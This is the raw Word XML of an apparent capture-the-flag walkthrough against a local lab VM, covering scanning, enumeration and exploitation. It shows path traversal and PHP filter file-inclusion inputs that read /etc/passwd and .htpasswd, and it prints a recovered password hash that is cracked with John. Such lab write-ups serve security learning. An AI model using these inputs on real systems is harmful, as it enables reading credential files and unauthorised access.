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4A983D6D" w:rsidR="00C173B3" w:rsidRDefault="00775F2D" w:rsidP="00DC0550">
      <w:pPr>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Walkthrough - </w:t>
      </w:r>
      <w:r w:rsidR="008548CF">
        <w:t>Template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758FF2F0" w14:textId="60BDE534" w:rsidR="0063338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8896" w:history="1">
            <w:r w:rsidR="00633385" w:rsidRPr="009815C0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Host Discovery</w:t>
            </w:r>
            <w:r w:rsidR="00633385">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00633385">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00633385">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc147658896 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00633385">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00633385">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00633385">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="00633385">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2E67CEE2" w14:textId="38C8C79D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897" w:history="1">
            <w:r w:rsidRPr="009815C0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8AF1" w14:textId="76DCADAC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898" w:history="1">
            <w:r w:rsidRPr="009815C0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2D66" w14:textId="1074DE80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899" w:history="1">
            <w:r w:rsidRPr="009815C0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6079" w14:textId="40B2A7F3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00" w:history="1">
            <w:r w:rsidRPr="009815C0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>J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C133" w14:textId="1F77694A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01" w:history="1">
            <w:r w:rsidRPr="009815C0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>WFu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80B1" w14:textId="0FB9EA5F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02" w:history="1">
            <w:r w:rsidRPr="009815C0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E4DD" w14:textId="632633BA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03" w:history="1">
            <w:r w:rsidRPr="009815C0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink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AE9B" w14:textId="7215164A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04" w:history="1">
            <w:r w:rsidRPr="009815C0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Jo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2C40" w14:textId="1ED9A5B0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05" w:history="1">
            <w:r w:rsidRPr="009815C0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>WFU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7914" w14:textId="48273115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06" w:history="1">
            <w:r w:rsidRPr="009815C0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D3CC" w14:textId="49CAD0E2" w:rsidR="00633385" w:rsidRDefault="0063338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8907" w:history="1">
            <w:r w:rsidRPr="009815C0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Cur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29A6" w14:textId="6EAE1208" w:rsidR="00633385" w:rsidRDefault="0063338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8908" w:history="1">
            <w:r w:rsidRPr="009815C0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Sudo -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BEEA" w14:textId="6CEC227C" w:rsidR="00633385" w:rsidRDefault="0063338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8909" w:history="1">
            <w:r w:rsidRPr="009815C0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E947" w14:textId="09E2EA25" w:rsidR="00633385" w:rsidRDefault="0063338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8910" w:history="1">
            <w:r w:rsidRPr="009815C0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Switching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3391" w14:textId="66937421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11" w:history="1">
            <w:r w:rsidRPr="009815C0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155F" w14:textId="6FF20008" w:rsidR="00633385" w:rsidRDefault="006333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12" w:history="1">
            <w:r w:rsidRPr="009815C0">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Fl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484EB33B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C3012F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc147658896"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Host Discovery</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="5EC1B087" w14:textId="7AF5DFEC" w:rsidR="00D21621" w:rsidRDefault="00912E1D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="63CB9DFD" wp14:editId="459C4FA1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731510" cy="837565"/>
            <wp:effectExtent l="0" t="0" r="2540" b="635"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21125"/>
                <wp:lineTo x="21538" y="21125"/>
                <wp:lineTo x="21538" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="165049574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9574" name="Picture 1" descr="A black and white screen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561">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="580F48D8" wp14:editId="2244A94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571429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23" y="19696"/>
                <wp:lineTo x="21423" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="74093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60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F377E" w14:textId="3307DAB2" w:rsidR="00D21621" w:rsidRDefault="00DC252E">
      <w:r w:rsidRPr="008F3A30">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Kali</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="007416F9">
        <w:t>192.168.56.101</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57AA17F0" w14:textId="2B291679" w:rsidR="006B0561" w:rsidRDefault="007416F9">
      <w:r w:rsidRPr="008F3A30">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Victim</w:t>
      </w:r>
      <w:r>
        <w:t>: 192.168.56.152</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07ABA748" w14:textId="110CBC12" w:rsidR="00D21621" w:rsidRDefault="00DC0550" w:rsidP="00190D42">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc147658897"/>
      <w:r>
        <w:t>Nmap</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="47CB4658" w14:textId="3631980E" w:rsidR="00D21621" w:rsidRDefault="00C95B02">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251665408" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="52F76F7A" wp14:editId="3172DDA8">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>25400</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>273050</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4266667" cy="590476"/>
            <wp:effectExtent l="0" t="0" r="635" b="635"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20926"/>
                <wp:lineTo x="21507" y="20926"/>
                <wp:lineTo x="21507" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="1229799615" name="Picture 1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9615" name="Picture 1" descr="A close up of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E30">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251663360" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="14C34595" wp14:editId="670AAA1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247619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409" y="19855"/>
                <wp:lineTo x="21409" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="6647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3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51B0E" w14:textId="40EBEEB6" w:rsidR="003C2E30" w:rsidRDefault="003C2E30"/>
    <w:p w14:paraId="460976DA" w14:textId="2623D391" w:rsidR="003C2E30" w:rsidRDefault="00140CBF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251667456" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="738C5403" wp14:editId="055201FD">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>581660</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="474980"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1270"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20791"/>
                <wp:lineTo x="21538" y="20791"/>
                <wp:lineTo x="21538" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="199675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53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FE5BF66" wp14:editId="749A4066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31510" cy="183515"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20180"/>
                <wp:lineTo x="21538" y="20180"/>
                <wp:lineTo x="21538" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="104487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795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D2058" w14:textId="1F65ACE3" w:rsidR="00DC0550" w:rsidRDefault="00DC0550" w:rsidP="00190D42">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc147658898"/>
      <w:r>
        <w:t>Nikto</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="2C14F29B" w14:textId="7099827C" w:rsidR="00EC6536" w:rsidRDefault="005E2709">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251671552" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4C2FD3BF" wp14:editId="1775CF8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42857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395" y="19855"/>
                <wp:lineTo x="21395" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="21271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3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74159" w14:textId="7A7F9495" w:rsidR="00B948E1" w:rsidRDefault="00A86E18">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251675648" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7E025102" wp14:editId="0B74026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4438095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18" y="19696"/>
                <wp:lineTo x="21418" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="14062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6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AB3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251673600" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3B92A676" wp14:editId="0D76C5C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542857" cy="161905"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="17858"/>
                <wp:lineTo x="21372" y="17858"/>
                <wp:lineTo x="21372" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="94226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62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706ED" w14:textId="5D3EB00E" w:rsidR="00B948E1" w:rsidRDefault="00BC7FF1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251677696" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1E622EF3" wp14:editId="4BA07A0B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3723809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438" y="19855"/>
                <wp:lineTo x="21438" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="4763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5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3C857" w14:textId="77777777" w:rsidR="00D21621" w:rsidRDefault="00D21621"/>
    <w:p w14:paraId="7749EF15" w14:textId="78B6CB96" w:rsidR="00D21621" w:rsidRDefault="00DC0550" w:rsidP="00190D42">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc147658899"/>
      <w:r>
        <w:t>Viewing Website</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="65BCED0D" w14:textId="3D2961B4" w:rsidR="00D21621" w:rsidRDefault="00035878">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251679744" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="29B82BC4" wp14:editId="68D9928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43000" cy="197485"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="18752"/>
                <wp:lineTo x="21240" y="18752"/>
                <wp:lineTo x="21240" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="57969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95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9558" cy="19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C26FFAA" wp14:editId="46181941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1502410" cy="165100"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="19938"/>
                <wp:lineTo x="21363" y="19938"/>
                <wp:lineTo x="21363" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="31609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96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49C1C" w14:textId="5201D257" w:rsidR="006F1CAB" w:rsidRDefault="006F1CAB"/>
    <w:p w14:paraId="7CF9FA04" w14:textId="1BF04326" w:rsidR="00A61DAC" w:rsidRDefault="003361A0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251683840" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="58CE051C" wp14:editId="525C0EC4">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>19050</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>189865</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1369695" cy="184150"/>
            <wp:effectExtent l="0" t="0" r="1905" b="6350"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20110"/>
                <wp:lineTo x="21330" y="20110"/>
                <wp:lineTo x="21330" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="119621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135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229">
        <w:t>The contents of /secret/ contain a jpg which may need to be extracted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B268A5" w14:textId="655C2B26" w:rsidR="00A61DAC" w:rsidRDefault="00A61DAC"/>
    <w:p w14:paraId="4DA0F327" w14:textId="3F35E5BA" w:rsidR="006F1CAB" w:rsidRDefault="00F1360E" w:rsidP="00470C89">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc147658900"/>
      <w:r>
        <w:t>JS File</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="48E54528" w14:textId="51F6CB7A" w:rsidR="00F1360E" w:rsidRDefault="00541448">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251685888" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="35E6E158" wp14:editId="03E8F026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3190476" cy="352381"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="19884"/>
                <wp:lineTo x="21411" y="19884"/>
                <wp:lineTo x="21411" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="22536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88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60E">
        <w:t>I was browsing through javascript files and I noticed that one of the files contained some info.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7236C703" w14:textId="28304008" w:rsidR="00B66F05" w:rsidRDefault="009B1360">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251687936" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1238C694" wp14:editId="5E1539F0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3095238" cy="219048"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="18837"/>
                <wp:lineTo x="21405" y="18837"/>
                <wp:lineTo x="21405" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="50963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33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37E3D" w14:textId="54E67556" w:rsidR="006D659D" w:rsidRDefault="006D659D"/>
    <w:p w14:paraId="47825533" w14:textId="1A1C867D" w:rsidR="00541448" w:rsidRDefault="004A248B">
      <w:r>
        <w:t>I know though about injecting ../../etc/passwd which didn’t result in anything (despite adding ../ many tim</w:t>
      </w:r>
      <w:r w:rsidR="00121A4D">
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t>s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B38E376" w14:textId="77777777" w:rsidR="007F3741" w:rsidRDefault="007F3741"/>
    <w:p w14:paraId="6896E119" w14:textId="4D907152" w:rsidR="007F3741" w:rsidRDefault="0005480D" w:rsidP="0005480D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc147658901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C4793CC" wp14:editId="395828B0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731510" cy="211455"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="19459"/>
                <wp:lineTo x="21538" y="19459"/>
                <wp:lineTo x="21538" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="93561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15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741">
        <w:t>WFuzz</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="35B82501" w14:textId="1892ADCA" w:rsidR="00E64FAA" w:rsidRDefault="0005480D">
      <w:r>
        <w:t>I decided to check for more possible domains.</w:t>
      </w:r>
      <w:r w:rsidR="003C4EB1">
        <w:t xml:space="preserve"> That didn’t really help.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6668D149" w14:textId="3767B2A9" w:rsidR="00FA0EFB" w:rsidRDefault="00FA0EFB" w:rsidP="00AD110E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc147658902"/>
      <w:r>
        <w:t>Exploitation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="4CB1980F" w14:textId="6D68BEB3" w:rsidR="00AD110E" w:rsidRDefault="00AD110E" w:rsidP="00AD110E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc147658903"/>
      <w:r>
        <w:t>Curl</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="4BE4836C" w14:textId="33A998F8" w:rsidR="00AD110E" w:rsidRDefault="00000000">
      <w:hyperlink r:id="rId21" w:history="1">
        <w:r w:rsidR="001350A6" w:rsidRPr="00BA0BCE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://192.168.56.152/index.php?referer=php://filter/convert.base64-encode/resource=/etc/passwd</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7C5E060B" w14:textId="61EB4306" w:rsidR="001350A6" w:rsidRDefault="00D27283">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251692032" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="51E8C25B" wp14:editId="19771BF7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5731510" cy="600710"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21235"/>
                <wp:lineTo x="21538" y="21235"/>
                <wp:lineTo x="21538" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="37135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24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A6">
        <w:t>I continued trying to use this and eventually I used curl to see if I could get anything useful</w:t>
      </w:r>
      <w:r w:rsidR="003E1C86">
        <w:t xml:space="preserve"> (could also use burp suite)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD98005" w14:textId="65A19940" w:rsidR="00D27283" w:rsidRDefault="00EE3B80">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251694080" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6A0043A0" wp14:editId="038128DC">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>967740</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5731510" cy="160020"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="18000"/>
                <wp:lineTo x="21538" y="18000"/>
                <wp:lineTo x="21538" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="180102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9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A4B">
        <w:t>This gave me some insights (I had to decode the base64).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D2B0F6" w14:textId="3EA4DE04" w:rsidR="00EE3B80" w:rsidRDefault="003E16CE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251696128" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6B772D29" wp14:editId="2D108153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308350" cy="511810"/>
            <wp:effectExtent l="0" t="0" r="6350" b="2540"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20903"/>
                <wp:lineTo x="21517" y="20903"/>
                <wp:lineTo x="21517" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="166163810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38108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042">
        <w:t>I then read this config file for apache.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> I also found a piece that said htaccess if a key file.</w:t>
      </w:r>
      <w:r w:rsidR="00794A68">
        <w:t xml:space="preserve"> If .htaccess doesn’t work, I can try .htpasswd.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE0A215" w14:textId="23BD3654" w:rsidR="003E16CE" w:rsidRDefault="003E16CE"/>
    <w:p w14:paraId="3BE11555" w14:textId="07FAF82A" w:rsidR="003E16CE" w:rsidRDefault="00E552F3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251698176" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="34FCAFD7" wp14:editId="3AB79771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4046855" cy="469900"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21016"/>
                <wp:lineTo x="21454" y="21016"/>
                <wp:lineTo x="21454" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="55847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79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80">
        <w:t>I read .htaccess and nothing of interest came, but then .htpasswd saw a base64 password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A102098" w14:textId="1B398048" w:rsidR="001E31BE" w:rsidRDefault="001E31BE"/>
    <w:p w14:paraId="2F98E4C2" w14:textId="77777777" w:rsidR="00E552F3" w:rsidRDefault="00E552F3"/>
    <w:p w14:paraId="7B222FC2" w14:textId="03E473D1" w:rsidR="00C712DB" w:rsidRDefault="00C712DB">
      <w:r w:rsidRPr="002B08FE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Decode the base64</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1971ED" w14:textId="007BE2C4" w:rsidR="00E552F3" w:rsidRDefault="00C712DB">
      <w:r w:rsidRPr="00C712DB">
        <w:t>developers:$apr1$ntOz2ERF$Sd6FT8YVTValWjL7bJv0P0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E62C546" w14:textId="563E167A" w:rsidR="00ED3B35" w:rsidRDefault="00687BFA" w:rsidP="00BA3BDB">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc147658904"/>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251700224" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4C86065D" wp14:editId="26F12C99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608955" cy="294640"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="19552"/>
                <wp:lineTo x="21495" y="19552"/>
                <wp:lineTo x="21495" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="79393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303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B35">
        <w:t>John</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="0671E3D3" w14:textId="595C1A57" w:rsidR="00ED3B35" w:rsidRDefault="008B0540">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251702272" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3D6B5824" wp14:editId="1DD5D83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2028571" cy="409524"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20124"/>
                <wp:lineTo x="21302" y="20124"/>
                <wp:lineTo x="21302" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="13770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00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E9901" w14:textId="77777777" w:rsidR="000B3561" w:rsidRDefault="000B3561"/>
